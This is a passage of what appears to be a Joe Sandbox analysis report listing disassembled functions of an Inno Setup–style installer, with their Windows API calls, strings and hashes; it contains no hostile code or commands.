                                                                                                                                                                                                                                                                                                                                                                  • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A88
                                                                                                                                                                                                                                                                                                                                                                  • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456AB5
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                                                                                                                                                                                                                                                                                                  • String ID: LoadTypeLib$RegisterTypeLib
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1312246647-2435364021
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 384f0062f956a7e6e5f729262f076ec348bfef461e3db0757be0fdeeca084a77
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5567ca09ff2ddd9e87874ef4cfa4ab968baaa8f1c3db1669d027a8a21fc87fa6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 384f0062f956a7e6e5f729262f076ec348bfef461e3db0757be0fdeeca084a77
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20119331B00604AFDB11EFA6CD55A5EB7BDEB8A705B51C4B6BC04E3652DA389E04CB24
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00456F8C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456FA6
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00457043
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Failed to create DebugClientWnd, xrefs: 0045700C
                                                                                                                                                                                                                                                                                                                                                                  • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456FD2
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3850602802-3720027226
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 345551639f8b27766301e9e59f8d3f8ac3a07f1b0a74ed7456ec139a41780bf8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 61f5065308a022425a12d25e559eb7300ab1b4b0d104b50eccf394a1c4e119f6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 345551639f8b27766301e9e59f8d3f8ac3a07f1b0a74ed7456ec139a41780bf8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 921123706082509BD300AB689C82B5F7BD89B55719F45403BF9859B3C3D7798C08C7AE
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00495D70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59processCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495E38,?,00495E2C,00000000,00495E13), ref: 00495DDE
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(x^I,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495E38,?,00495E2C,00000000), ref: 00495DF5
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00495CC8: GetLastError.KERNEL32(00000000,00495D60,?,?,?,?), ref: 00495CEC
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateErrorHandleLastProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID: D$x^I
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3798668922-903578107
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d60ed255e20571b71141afc2cf93a9e2f93bc71f51a1d4f388e25b9cf259bfea
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0d7d1bccb2b79611993d32b5dcf50d38d0c3e5c5098d5d0063742a7482510134
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d60ed255e20571b71141afc2cf93a9e2f93bc71f51a1d4f388e25b9cf259bfea
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F201A1B1604648AFDF01EBA2DC42E9FBBACDF08704F60003AF904E72C1D6385E008A28
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00478608 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowkeyboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                                                                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 00478673
                                                                                                                                                                                                                                                                                                                                                                  • GetKeyState.USER32(0000007A), ref: 00478685
                                                                                                                                                                                                                                                                                                                                                                  • WaitMessage.USER32(?,00000000,004786AC,?,00000000,004786D3,?,?,00000001,00000000,?,?,?,0047FED4,00000000,00480D8E), ref: 0047868F
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FocusMessageStateTextWaitWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Wnd=$%x
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1381870634-2927251529
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1a422d4577b49dccfc2774414577709a46ec3ce372f56b5ec11200a8bbcf7a92
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ef44951ba698f020dd2967180cd2d6f5e0b89f016f08406409eb47c9a327eab3
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a422d4577b49dccfc2774414577709a46ec3ce372f56b5ec11200a8bbcf7a92
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2411A374644244BFC700EF65DD45A9E7BF8EB49714B5184BAF408E3691DB38AE00CA6E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0046E8B8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E8C0
                                                                                                                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E8CF
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Time$File$LocalSystem
                                                                                                                                                                                                                                                                                                                                                                  • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1748579591-1013271723
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2e2682d59cfc45f7ed460395edcc4d500eda373c92ad7cb826f7e8648d0918d2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5dd70de3b3cbc2db986134396dd9c806d54cb2705fd1511918c86a199fc004ed
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e2682d59cfc45f7ed460395edcc4d500eda373c92ad7cb826f7e8648d0918d2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1711F8A440C3919AD340DF2AC44432BBBE4AF89704F44892EF9D8D6381E779C948DB77
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00453F62 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F6F
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                                                                                                                                                                                                                                                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 00453F94
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: File$AttributesDeleteErrorLastMove
                                                                                                                                                                                                                                                                                                                                                                  • String ID: DeleteFile$MoveFile
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3024442154-139070271
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a73332e20fb51f61cc9e6374d9a091a23df7681eb66bdd11e7445de22a3855cd
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b42c41819cc20c1867e4fcb1ab4fb5766129ddbc0fc5112b2d6697d8e42203d6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a73332e20fb51f61cc9e6374d9a091a23df7681eb66bdd11e7445de22a3855cd
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49F062716041455AEB01FAA5D84266EA3ECDB8430BFA0403BB800BB6C3DA3C9E09493D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004559FC Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,00455A67,?,00000001,00000000), ref: 00455A5A
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A08
                                                                                                                                                                                                                                                                                                                                                                  • PendingFileRenameOperations, xrefs: 00455A2C
                                                                                                                                                                                                                                                                                                                                                                  • PendingFileRenameOperations2, xrefs: 00455A3B
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                                                                                                                                  • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 47109696-2115312317
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 288fefab65a8ee25b8e89116329dc87326048bf110408f218b3be69a5fbc4c11
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a84b10804161a04e9b7828e63518c67389a2277fb2d5ef6d9c2d81c30e1ce2e0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 288fefab65a8ee25b8e89116329dc87326048bf110408f218b3be69a5fbc4c11
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49F09671714A04BFEB05D665DC72E3A739CD744B15FA1446BF800C6682DA7DBE04951C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00483644 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483685
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004836A8
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • System\CurrentControlSet\Control\Windows, xrefs: 00483652
                                                                                                                                                                                                                                                                                                                                                                  • CSDVersion, xrefs: 0048367C
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3677997916-1910633163
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6de4baa14c4a6f57e7e0fa87305810bbac6c938c7252870eebf96be844e5f735
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3c550b8be62ae6962ae8a8b2bb2136c6a1766c1456238aff6c9f059f5d92f743
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6de4baa14c4a6f57e7e0fa87305810bbac6c938c7252870eebf96be844e5f735
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1F06D75E00208B6DF20EED88C45BAFB3BCAF14B05F204566E910E7381F6789B448B59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004596C8 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459805,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459715
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 47109696-2631785700
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4c96ae261619d9cb3d7b753369be860faed2130504991989f0550c0ea906856f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5fc53f2980ca067f7fdefaa7aa50a153e5e830959166a8c5adde0da5508e813c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c96ae261619d9cb3d7b753369be860faed2130504991989f0550c0ea906856f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97F0AF35720150DBCB10EF5AE885B4E6298DB99396F50403BB985CB263C77CCC06CA99
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042D900 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B46,00000000,00453BE9,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FD9,00000000), ref: 0042D91A
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D920
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-4063490227
